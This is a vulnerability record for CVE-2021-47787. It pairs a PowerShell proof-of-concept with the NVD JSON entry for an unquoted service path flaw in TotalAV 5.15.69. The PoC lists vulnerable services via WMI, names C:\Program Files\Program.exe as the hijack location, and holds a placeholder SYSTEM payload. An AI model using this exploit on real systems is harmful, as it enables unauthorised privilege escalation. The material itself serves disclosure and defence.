CVE-2021-47787

# CVE-2021-47787 PoC - TotalAV Unquoted Service Path # This PoC demonstrates the path hijacking vulnerability $malicious_exe = @' // Simple malicious executable placeholder // In real attack, replace with actual payload #include <windows.h> int WinMain() { // Payload execution with SYSTEM privileges system("cmd.exe /c whoami > C:\\temp\\pwned.txt"); return 0; } '@ # Step 1: Identify unquoted service paths for TotalAV $services = Get-WmiObject win32_service | Where-Object { $_.pathname -like '*TotalAV*' -and $_.pathname -notmatch '"' } Write-Host "[+] Found TotalAV services with unquoted paths:" $services | Select-Object name, pathname | Format-Table # Step 2: Extract path segments to determine hijackable location foreach ($svc in $services) { $path = $svc.pathname $segments = $path -split '\\' | Where-Object { $_ -ne '' } Write-Host "[+] Service: $($svc.name)" Write-Host "[+] Checking writable path segments..." } # Step 3: Create malicious executable in hijacked location # Note: Requires write access to a path segment before a space $target_path = "C:\\Program Files\\Program.exe" Write-Host "[+] Creating malicious executable at: $target_path" # In practice, compile and place actual payload here # Step 4: Trigger service restart to execute payload Write-Host "[+] Waiting for service restart..." # Use: Restart-Service -Name "ServiceName" (requires admin) Write-Host "[+] If successful, payload should execute with SYSTEM privileges"

{"cve": {"id": "CVE-2021-47787", "sourceIdentifier": "[email protected]", "published": "2026-01-16T00:16:22.073", "lastModified": "2026-02-09T14:08:05.210", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "TotalAV 5.15.69 contains an unquoted service path vulnerability in multiple system services running with LocalSystem privileges. Attackers can place malicious executables in specific unquoted path segments to potentially gain SYSTEM-level access by exploiting the service path configuration."}, {"lang": "es", "value": "TotalAV 5.15.69 contiene una vulnerabilidad de ruta de servicio sin comillas en múltiples servicios del sistema que se ejecutan con privilegios de LocalSystem. Los atacantes pueden colocar ejecutables maliciosos en segmentos de ruta sin comillas específicos para obtener potencialmente acceso a nivel de SYSTEM explotando la configuración de la ruta del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-428"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:totalav:totalav:5.15.69:*:*:*:*:*:*:*", "matchCriteriaId": "A83C7F91-391F-40CB-9E27-F31EBCC60B76"}]}]}], "references": [{"url": "https://www.exploit-db.com/exploits/50314", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}, {"url": "https://www.totalav.com", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://www.vulncheck.com/advisories/totalav-unquoted-service-path", "source": "[email protected]", "tags": ["Third Party Advisory"]}, {"url": "https://www.exploit-db.com/exploits/50314", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Third Party Advisory", "VDB Entry"]}]}}